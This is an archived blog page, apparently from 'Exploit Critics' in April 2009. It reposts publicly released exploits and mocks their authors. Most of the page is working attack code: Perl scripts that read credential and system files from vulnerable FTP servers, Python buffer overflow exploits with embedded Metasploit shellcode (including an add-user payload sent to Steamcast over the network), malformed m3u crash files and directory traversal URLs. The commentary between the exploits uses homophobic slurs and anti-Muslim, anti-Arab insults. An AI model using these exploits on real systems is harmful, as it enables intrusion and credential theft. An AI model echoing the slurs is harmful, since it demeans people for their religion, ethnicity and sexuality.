Exploit Critics: April 2009

Thursday, April 23, 2009

Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit

Main critism: OH FUCK /me goes to turn off my shitty ass dream ftp server running on winblowz 3.11


#!/usr/bin/perl -w
#
# This Bug Similar to others found By My Friend : Stack <= so special Thanx
# So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
# But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat
# In This Exploit I Used The Port 80 You can use any port you want 21
#################################################################################################################################
#23/04/2009 13:20:25  FTP Server started on port 80.
#23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server
#23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004
#23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220  
#23/04/2009 13:25:43  [0000000002] USER anonymous
#23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous
#23/04/2009 13:25:43  [0000000002] PASS **********
#23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.
#23/04/2009 13:25:43  [0000000002] PWD
#23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.
#23/04/2009 13:25:43  [0000000002] TYPE I
#23/04/2009 13:25:43  [0000000002] 200 Type set to I
#23/04/2009 13:25:43  [0000000002] CWD Program Files
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
#23/04/2009 13:25:43  [0000000002] CWD BolinTech
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
#23/04/2009 13:25:43  [0000000002] MDTM users.dat
#23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.
#23/04/2009 13:25:43  [0000000002] PASV
#23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
#23/04/2009 13:25:43  [0000000002] RETR users.dat
#23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
#23/04/2009 13:25:43  [0000000002] 226 Transfer complete
#23/04/2009 13:25:43  [0000000002] Client disconnected from 127.0.0.1.
#################################################################################################################################
# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
#################################################################################################################################
# welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
#################################################################################################################################
# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
#################################################################################################################################
use LWP::Simple;
use LWP::UserAgent;

print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 3)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port \n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";
}
($HackerName, $TargetIP, $AttackedPort) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print("          ******************************\n");
print("          *             Status         *\n");
print("          ******************************\n");
print("$HackerName , AttaCking The Target : $TargetIP \n");
print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
$terget1="Program Files";
$target2="BolinTech";
$target3="users.dat";
$slash="/";
$TargetFile=$terget1.$slash.$target2.$slash.$target3;
$temp="/" x 2;
my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");

Seriously, write a proper exploit you lame ass.

CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit

Main critism: WHAT IN THE NAME OF COCK SUCKING ALLAH MUHAMMAD SHIT FACE IS WITH FAGGOTS WRITING 9834894389284 EXPLOITS FOR ONE OR TWO SHITTY BUGS!?


# CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# By Stack Sysworm.com
# Note abouts this Exploit : right click >> Option >> Open >> select our target file and boooooom calc executed :d
# Note abouts the last exploit (m3u): my first Exploit Have just 212 + 4 - Junk + eip i dont know why didin't be the same for my sweety freind His0ka
# When i test He's exploit it didin't work and the ret adress be far from eip register and it overwrited by A's junk i dont know why but i think the junk change from box to box
# Thnx for all freind ( Jadi - Mr.Safa7 - Hod - His0ka - Djekmani etc ......
# Thnx for the great str0ke thnx for your support :d
chars = "\x41" * 1504
eip = "\xED\x1E\x94\x7C" # ntdll.dll jmp esp SP 2 FR / EN
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x48\x4e\x37"
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x38"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x56\x4b\x38\x42\x54\x42\x43\x45\x58\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x44\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x33\x4f\x55\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x56\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x36\x43\x56\x50\x52\x45\x36\x4a\x37\x45\x46\x42\x50\x5a")
poc = (header+chars+eip+"\x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()

Stack: "CREDIT TO MUHAMMAD FOR MY WHORE OF A MOTHER HAVING ME TO IRRITATE REAL HACKERS BY POSTING SHIT ON MILWORM!"

Monday, April 20, 2009

CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC

Main critism: LETS WELCOME THE NEWEST SCRIPT KIDDIE ON THE SHIT EXPLOIT SCENE, Gold_M!


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##
# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## 
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

Its a super stack overflowz!

Thursday, April 16, 2009

Apollo 37zz (M3u File) Local Heap Overflow PoC

Main critism: Just because you control eax doesn't mean its a fucking heap overflow you no talent loser.



#!/usr/bin/perl
#
#
# *******************************************************************************
# *               Apollo 37zz (.M3U File) Local Heap Overflow PoC               *
# *******************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : Paradis_des_fous@hotmail.fr
# Home     : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM
# Greetz to: Hussin X , Jiko , ZoRLu , Stack ,Nabilx , Mag!c ompo , And All MoroCCaN HaCkers
# And SP tHANX To : Figuig and Oujda City //Im so proud to be figuigian
#
#
# Download : http://apollo.capacala.com/Apollo37zz.exe
#
#OllyDbg Registers
#EAX 41414141
#ECX 00000000
#EDX 00000000
#EBX 0095488C ASCII "1%num% http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#ESP 0012CA00
#EBP 00954080
#ESI 0012CA24
#EDI 0047A880 Apollo.0047A880
#EIP 00416108 Apollo.00416108

my $M3U = "#EXTM3U\n";

my $ProofOfConcept= "http://".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; # 1014

open(MYFILE,'>>buffer1.m3u');

print MYFILE $M3U.$ProofOfConcept;

close(MYFILE);

print "Done! For Fun ;)";

"Done for fame, loser fame, and animal pron 4 life" - His (her?) new slogan

Wednesday, April 15, 2009

ASX to MP3 Converter (.M3U File) Local Stack Overflow PoC

Main critism: Cyber-Zone seems to be Stack's online fat gay lover.



#!/usr/bin/perl
#
#
# ************************************************************************
# *     ASX to MP3 Converter (.M3U File) Local Stack Overflow POC        *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : Paradis_des_fous@hotmail.fr
# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26121;# just Poc tested under MS windows SP2 Fr

open(MYFILE,'>>KHAL.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

What do you get when you put two fuckup script kids together? No 0day. No Exploit. No Code. YOU OWN EIP MOTHER FUCKER!? WHERES THE FUCKING SHELL YOU STUPID FUCK!!!!!!!!!!!!!!!

ftpdmin 0.96 Arbitrary File Disclosure Exploit

Main critism: Stack, YOUR FUCKING LAME!



#!/usr/bin/perl
#       ftpdmin 0.96 Arbitrary File Disclosure Exploit
#       Vulnerability Disclosure by 1 Slach or 2 Slach
#       Tested on Win XP SP2 but it work in other box environment
# Abouts Exploit : first thing after we exec the application it make our box a simple ftp server
# so like we see if we want conect in ftp we make that's cmd >> ftp 127.0.0.1 >> user & password allright
# but here our application make an ftp link for exec and partage some file in our box
# so we profite with this partage fontion to get some importent file in server like boot.ini for example
# for that's i make this exploit it conect to ftp trget via 21 port and if after with a single or doble slach we wrote
# our importent file like boot.ini
# so this the end of all
# message for (ks) use your mind to have more importent thing in server
 

use LWP::Simple;
use LWP::UserAgent;
 
if (@ARGV < 3) {
            print("Usage: $0     \n");
            print("TARGETS are\n ");
            print("Define full path with file name \n");
            print("Example FTP: perl $0 127.0.0.1 21 boot.ini \n");
            exit(1);
                    }
                    ($target, $port,$filename) = @ARGV;
        print("ftpdmin 0.96 Exploit : Coded by Stack!\n");
        print("Attacking $target on port $port!\n");
        print("FILENAME:  $filename\n");
       
        $temp="/" x 2;
         my $url= "ftp://". $target. ":" . $port .$temp . $filename;
            $content=get $url;
            print("\n FILE CONTENT STARTED");
            print("\n -----------------------------------\n");
            print("$content");
            print("\n -------------------------------------\n");

Your code is shit. Give up and stop embarrassing yourself you idiot!

Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability

Main critism: WHAT>>THE>>FUCK>>>



Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-036

original advisory: http://dsecrg.com/pages/vul/DSECRG-09-036.html

Application:                Chance-i DiViS DVR System web-server
Versions Affected:          2.0
Vendor URL:                 http://www.chance-i.com/
Bug:                        Directory Traversal File Download
Exploits:                   YES
Reported:                   13.03.2009
Second Reported:            20.03.2009
Solution:                   NONE
Date of Public Advisory:    09.04.2009
Author:                     Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)



Description
***********

DiViS DVR System web-server which fingerprints as Techno Vision Security System has Directory Traversal vulnerability.



Details
*******

Directory traversal vulnerability find in DiViS DVR System web-server.

Successfully exploiting these issues allows remote attackers to access the contents of arbitrary files.

Example:

http://[server]/../../../../../../../boot.ini



Solution:
*********

We did not get any response from vendor for more than 2 weeks.

No patches aviable.



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsecrg [dot] com
            http://www.dsecrg.com
            http://www.dsec.ru

"Digital Security is leading IT security company in Russia" = Wow, Russia just disowned you.

Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit

Main critism: Does anyone in the arab world know how to make a decent fucking header!? SHIT!


# exploit.py
# Abee Chm eBook Creator 2.11 Stack overflow Exploit
# By:Encrypt3d.M!nd
#
# it's the same exploit i wrote for chm maker,everything is the same!!
# but there's a lil note that when importing 'Devil_Inside.chmprj' a message
# will pops up and tells that the project file format is outdated bla bla but after clicking
# ok it will load into the program,and just go to File>Make Ebook.. and calc
# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that
# so i've used the chm maker one :D

ns = "\xEB\x06\x90\x90"
sh = "\x05\x67\x35\x45"

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")

header1 = (
'\n'
..... should we really go on .....
'\n'
)


file=open('Devil_Inside.chmprj','w')
file.write(header1+header2)
file.close()

fucking l-a-m-e. who can't jump 6 these days... try smashing a kernel bug fuckwad. Somebody decrypt his mind so he can use it!

MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)

Main critism: OMG DON'T STEAL MY boot.ini!!!!ZZZZZZ



######################### MonGoose 2.4 (win) webserver Directory Traversal  ###################



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini

This kids name is as lame as he is. Get a fucking book and read it!

Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]

Main critism: Is it me or is SEH not cool anymore because of these kids playing with fire?



#!/usr/bin/python
#[*] Usage   : steamcast.py [victime_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Short Description : The previous exploit runs  small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.

import sys, socket
import struct

host = sys.argv[1] 
port = 8000


# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")

shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt

#It needs a loop to works
while 1:
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((host, port))
 head =  "GET / HTTP/1.1\r\n"
 head += "Host: "+host+"\r\n"
 head += exploit+"\r\n"
 head += "\r\n\r\n"

 s.send(head)

Python wasn't shit before Google bathed it in babyoil.. now its kid friendly!

Job2C (conf.inc) Config File Disclosure Vulnerability

Main critism: Are we the other ones that get tired of seeing this muslim bullshit posted across the internet? Get a fucking life.



                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<> Found by  :  Cyb3r-1sT

<> C0ntact : cyb3r-1st [at] hotmail.com 
                   
